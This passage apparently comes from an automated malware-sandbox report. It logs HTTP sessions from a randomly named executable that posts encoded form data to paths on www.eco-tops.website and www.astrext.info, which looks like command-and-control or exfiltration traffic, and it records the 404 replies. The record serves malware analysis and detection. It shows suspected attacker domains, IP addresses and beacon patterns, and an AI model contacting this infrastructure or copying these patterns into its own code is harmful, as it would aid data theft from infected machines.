                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.450010203.161.49.193802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:33:55.671230078 CET10895OUTPOST /n54u/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.eco-tops.website
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 10304
                                                                                    Origin: http://www.eco-tops.website
                                                                                    Referer: http://www.eco-tops.website/n54u/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 6a 6e 74 5a 73 33 6d 52 5a 37 57 5a 51 4a 69 4e 38 71 73 4d 69 45 63 4e 31 4f 6e 42 76 4b 4a 48 39 50 4b 68 6b 6e 6f 41 44 4c 75 34 66 55 4f 4e 53 65 6c 56 38 55 69 7a 57 6c 2f 55 4c 39 4e 4a 34 73 36 4e 30 4d 65 42 6b 4a 6d 41 56 4b 47 64 4a 43 70 34 39 49 67 73 4c 41 58 72 59 59 36 77 54 4d 30 46 6e 51 6b 31 2b 79 46 71 62 74 7a 61 30 7a 53 63 56 6d 30 46 6e 7a 62 43 35 50 74 79 6a 61 55 2b 62 44 55 64 2f 63 79 41 35 62 32 66 52 42 63 39 41 33 69 32 74 55 36 78 49 64 34 55 53 7a 79 32 49 30 68 57 4a 68 49 51 58 35 42 72 39 37 72 68 44 67 6c 68 55 4d 6d 71 6d 7a 35 52 78 4d 6b 70 6a 2f 42 68 51 6e 55 43 78 5a 58 73 45 55 56 2b 6d 65 41 4a 65 49 4a 45 6e 63 58 6b 57 5a 68 6e 70 57 34 69 73 49 63 77 50 6d 56 73 68 67 76 4b 37 46 6b 79 7a 58 36 4d 6e 4b 41 32 6c 34 2b 42 4c 6e 6a 67 52 2b 62 31 7a 2b 47 68 65 78 6e 31 43 61 30 72 78 53 58 6e 49 6a 59 6e 72 4f 31 64 39 6e 63 70 66 42 4d 6f 79 34 76 6f 37 65 56 45 64 39 41 2f 49 76 6d 6f 38 65 6b 6d 58 6d 71 4f 71 47 72 38 5a 30 [TRUNCATED]
                                                                                    Data Ascii: 9hCtofh=jntZs3mRZ7WZQJiN8qsMiEcN1OnBvKJH9PKhknoADLu4fUONSelV8UizWl/UL9NJ4s6N0MeBkJmAVKGdJCp49IgsLAXrYY6wTM0FnQk1+yFqbtza0zScVm0FnzbC5PtyjaU+bDUd/cyA5b2fRBc9A3i2tU6xId4USzy2I0hWJhIQX5Br97rhDglhUMmqmz5RxMkpj/BhQnUCxZXsEUV+meAJeIJEncXkWZhnpW4isIcwPmVshgvK7FkyzX6MnKA2l4+BLnjgR+b1z+Ghexn1Ca0rxSXnIjYnrO1d9ncpfBMoy4vo7eVEd9A/Ivmo8ekmXmqOqGr8Z0nhfs/azy1zSgGMYiEQDXPlSsPeXEIL/eEAW34Leqaq1uSRI4f3O2YAN6Alf4HggM9jJ5f3iO2AftMf8zq1+aCqf46IXgUdX18kYoJOKzVdborKIDEKyTpYXkLKMiEtTQE5wr5uaw3VA+dtTjOqz8SlAlwEPPixrmxMZBmuEVv3UCeLN0IeuNm1dx556emEglxpKzGj/1WBtESg7EKGqgrI1r1SmLJCXud1Q2W46RFBmIPd1RUfQeR2XPXWwsqYM9ekeuv8bRutIMgVcnMRhqF80fofV+mMBkgE2e9QlcW3f0jRWBQCO0JOJLbgVotFAd1frqWw4lZtdsiZtFuehT0XMseVN8uEPh8HjCZGP+TT9fYxKcWUmAK7RxWhNFVa4xkfPeGI7IthZqjlOmaPiLX1gM1JgEezVPL3p/K52rxSSWRoWHPtgsN/N8vQleqn55C/NMRtPabjBQ64kVt9uorp+hWcRfSYWleH9d/8Z/QovcRVX1L3Jgg8mv+vHZkLdk7Bmo9yfXiZb9D7A6sTdeuo04b4y2hIeWcNlEqEuMakhrclky5p2Xm+sIla1b7T+h77MkrZFOri1U3C12VDROE1EFCwizM4uf6PqtxKZVcxNHOebUi7jgVhqFWaoRuOulLOwgTczKd0eC0mKCWFlhgWg3qTHnu2DM9D [TRUNCATED]
                                                                                    Nov 6, 2024 20:33:56.352837086 CET533INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 06 Nov 2024 19:33:56 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.450011203.161.49.193802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:33:58.216128111 CET528OUTGET /n54u/?DxvPV=zbk0AVfPEjjhe&9hCtofh=ulF5vHaDZay2Ybep6qAhk1wtxYL4m99WqdjuqGF6KuylXEStCuZI2HnnajvzLLcIwfuU3NLav5OgU7G/d2ttg6MOKAz0GZXpV5QCkBYU0gl9adu5sQ6AV2I= HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Host: www.eco-tops.website
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Nov 6, 2024 20:33:58.884802103 CET548INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 06 Nov 2024 19:33:58 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.450012217.160.0.132802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:34:03.985291958 CET781OUTPOST /8u3q/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.astrext.info
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 204
                                                                                    Origin: http://www.astrext.info
                                                                                    Referer: http://www.astrext.info/8u3q/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 52 6b 51 4f 59 45 6a 6f 78 56 49 74 4b 34 68 6c 63 31 4d 59 33 70 4d 52 33 6d 63 47 62 7a 6e 34 77 69 73 72 64 79 78 4c 34 31 63 44 72 67 49 4a 39 6a 73 4a 53 71 34 50 2f 75 69 4b 64 69 6c 76 44 71 48 54 55 5a 41 57 4b 2f 70 50 4a 33 76 49 38 6b 66 36 43 69 7a 66 6e 32 31 53 76 62 66 30 30 38 47 52 5a 53 6c 76 4f 30 56 41 71 75 6d 71 38 70 45 72 39 50 74 58 33 33 4a 57 51 2b 34 37 6b 42 6a 42 6e 49 62 37 41 2b 67 6e 45 6d 4c 6e 31 30 65 39 4e 77 73 56 37 7a 6c 6e 4b 4f 38 6e 4a 57 4f 2b 2b 74 6a 30 31 72 56 71 7a 66 78 34 45 39 6f 31 72 33 2f 6d 44 34 4c 51 75 38 63 6b 31 41 3d 3d
                                                                                    Data Ascii: 9hCtofh=RkQOYEjoxVItK4hlc1MY3pMR3mcGbzn4wisrdyxL41cDrgIJ9jsJSq4P/uiKdilvDqHTUZAWK/pPJ3vI8kf6Cizfn21Svbf008GRZSlvO0VAqumq8pEr9PtX33JWQ+47kBjBnIb7A+gnEmLn10e9NwsV7zlnKO8nJWO++tj01rVqzfx4E9o1r3/mD4LQu8ck1A==
                                                                                    Nov 6, 2024 20:34:04.811105013 CET780INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Date: Wed, 06 Nov 2024 19:34:04 GMT
                                                                                    Server: Apache
                                                                                    X-Frame-Options: deny
                                                                                    Content-Encoding: gzip
                                                                                    Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                                    Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.450013217.160.0.132802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:34:06.607798100 CET801OUTPOST /8u3q/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.astrext.info
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 224
                                                                                    Origin: http://www.astrext.info
                                                                                    Referer: http://www.astrext.info/8u3q/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 52 6b 51 4f 59 45 6a 6f 78 56 49 74 4c 62 35 6c 62 6d 6b 59 38 70 4d 4f 72 32 63 47 52 54 6e 30 77 6a 51 72 64 33 55 57 34 47 34 44 6f 42 34 4a 76 57 41 4a 52 71 34 50 71 65 6a 41 54 43 6c 34 44 71 61 73 55 63 34 57 4b 2f 39 50 4a 32 66 49 2f 54 72 35 59 53 7a 64 38 6d 31 63 73 72 66 30 30 38 47 52 5a 53 68 56 4f 30 4e 41 71 65 57 71 6d 4d 77 30 68 66 74 55 6e 48 4a 57 55 2b 34 33 6b 42 69 6b 6e 4d 61 73 41 39 59 6e 45 6e 37 6e 31 6c 65 36 65 51 73 62 30 54 6b 7a 4c 4d 68 54 41 55 58 6b 6a 4f 58 61 72 37 4e 30 37 35 38 69 56 4d 4a 69 35 33 62 56 65 2f 43 6b 6a 2f 68 74 75 4e 68 64 46 61 76 6a 7a 54 41 51 50 2f 77 49 62 4c 55 41 76 4c 73 3d
                                                                                    Data Ascii: 9hCtofh=RkQOYEjoxVItLb5lbmkY8pMOr2cGRTn0wjQrd3UW4G4DoB4JvWAJRq4PqejATCl4DqasUc4WK/9PJ2fI/Tr5YSzd8m1csrf008GRZShVO0NAqeWqmMw0hftUnHJWU+43kBiknMasA9YnEn7n1le6eQsb0TkzLMhTAUXkjOXar7N0758iVMJi53bVe/Ckj/htuNhdFavjzTAQP/wIbLUAvLs=
                                                                                    Nov 6, 2024 20:34:07.413414955 CET780INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Date: Wed, 06 Nov 2024 19:34:07 GMT
                                                                                    Server: Apache
                                                                                    X-Frame-Options: deny
                                                                                    Content-Encoding: gzip
                                                                                    Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                                    Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.450014217.160.0.132802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:34:09.155528069 CET10883OUTPOST /8u3q/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.astrext.info
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 10304
                                                                                    Origin: http://www.astrext.info
                                                                                    Referer: http://www.astrext.info/8u3q/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 52 6b 51 4f 59 45 6a 6f 78 56 49 74 4c 62 35 6c 62 6d 6b 59 38 70 4d 4f 72 32 63 47 52 54 6e 30 77 6a 51 72 64 33 55 57 34 47 77 44 6f 7a 77 4a 2b 46 34 4a 51 71 34 50 72 65 6a 44 54 43 6b 36 44 71 54 6c 55 63 45 67 4b 35 35 50 47 77 44 49 2b 69 72 35 57 69 7a 64 31 47 31 64 76 62 65 32 30 2f 75 76 5a 54 52 56 4f 30 4e 41 71 63 4f 71 6f 4a 45 30 6a 66 74 58 33 33 49 5a 51 2b 35 6f 6b 42 37 5a 6e 4d 4f 38 42 4e 34 6e 46 48 72 6e 33 58 32 36 45 51 73 4f 39 44 6b 37 4c 4d 74 4d 41 55 4c 67 6a 4f 54 77 72 35 52 30 35 39 35 44 47 64 70 6c 73 42 61 4b 4b 50 47 51 71 59 52 2f 76 4e 78 35 49 72 6a 6e 77 33 63 63 49 50 68 66 4a 37 6b 43 74 64 6f 32 49 53 6a 6b 44 48 45 5a 4b 68 6b 45 4c 7a 64 51 74 55 6d 64 43 63 4f 70 72 74 2b 71 69 58 4e 4a 51 5a 52 31 71 62 77 68 55 61 33 32 6e 51 65 71 66 34 39 6f 4e 4e 45 62 6b 43 36 48 6d 45 39 34 4c 52 6f 78 47 38 69 74 6f 6a 34 70 6f 77 6a 68 4c 44 65 7a 4a 74 51 61 57 35 71 61 38 6b 4b 4b 45 43 6b 7a 79 37 2f 48 4f 53 54 46 48 4b 78 52 65 75 [TRUNCATED]
                                                                                    Data Ascii: 9hCtofh=RkQOYEjoxVItLb5lbmkY8pMOr2cGRTn0wjQrd3UW4GwDozwJ+F4JQq4PrejDTCk6DqTlUcEgK55PGwDI+ir5Wizd1G1dvbe20/uvZTRVO0NAqcOqoJE0jftX33IZQ+5okB7ZnMO8BN4nFHrn3X26EQsO9Dk7LMtMAULgjOTwr5R0595DGdplsBaKKPGQqYR/vNx5Irjnw3ccIPhfJ7kCtdo2ISjkDHEZKhkELzdQtUmdCcOprt+qiXNJQZR1qbwhUa32nQeqf49oNNEbkC6HmE94LRoxG8itoj4powjhLDezJtQaW5qa8kKKECkzy7/HOSTFHKxReuYKrPgyMsx+nXpsLUqbLGGHrng6SQ6p6M7r3IXWbXvD4IvCaF5TBCtuI7zUWgp9haN7v2mQWrU27voQZuXSY4NVLPbfqsm6ZTzs29ncsnujP81FwElfbtOKJUGE6X+Az7T9GBhKdkWXmr5s8ruBqGUsO+3jP11rUhE9/6DP8/Rd/Cx/RNILmDTo7vdcrVtjshfeAl1sTBAVxmoJrRQN8LBGxkCbK8ZB76lmIj8HJOx9VhBVXV/oPHeclWnv0hLQ/Wifhfdq4mNkAwQ9SrlXDRNMCFGEjBN4NNShQ5qoQwwy0CBvuNStjFVLv4L8uZAcRrR8LNccSSQ9VeITnuN8+QBTlkelzmuokW7u7jmB4wiDoZ51VHSjgf1ZV9e2QanPcJNVbBEh0mg7Aj9oBZ+l5eDoAD+Y/N420yestJQmO/AJmOVCU4wkMG9No08U9q+/sOPFWEQegisC34Pb+JH/HHMsxGLYyBgYuMcx/K0psXugFUc7nksmL9gcKBx8CTT97i91OjkikWGFF0+WkCbNykVGVk9rK2HrSNZ4QtL5jf41naVQavJWdcib2P1orQsIe7B4Y1oi5Rj1w4YjbcHeOS/vzPrdlQfTwvfFwkMEuSdwESytPpGuh+qt1404OxU9V0KXdvB563VB1APIlTy1W3bK4DzWujyp0mGs [TRUNCATED]
                                                                                    Nov 6, 2024 20:34:10.008156061 CET780INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Date: Wed, 06 Nov 2024 19:34:09 GMT
                                                                                    Server: Apache
                                                                                    X-Frame-Options: deny
                                                                                    Content-Encoding: gzip
                                                                                    Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                                                    Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
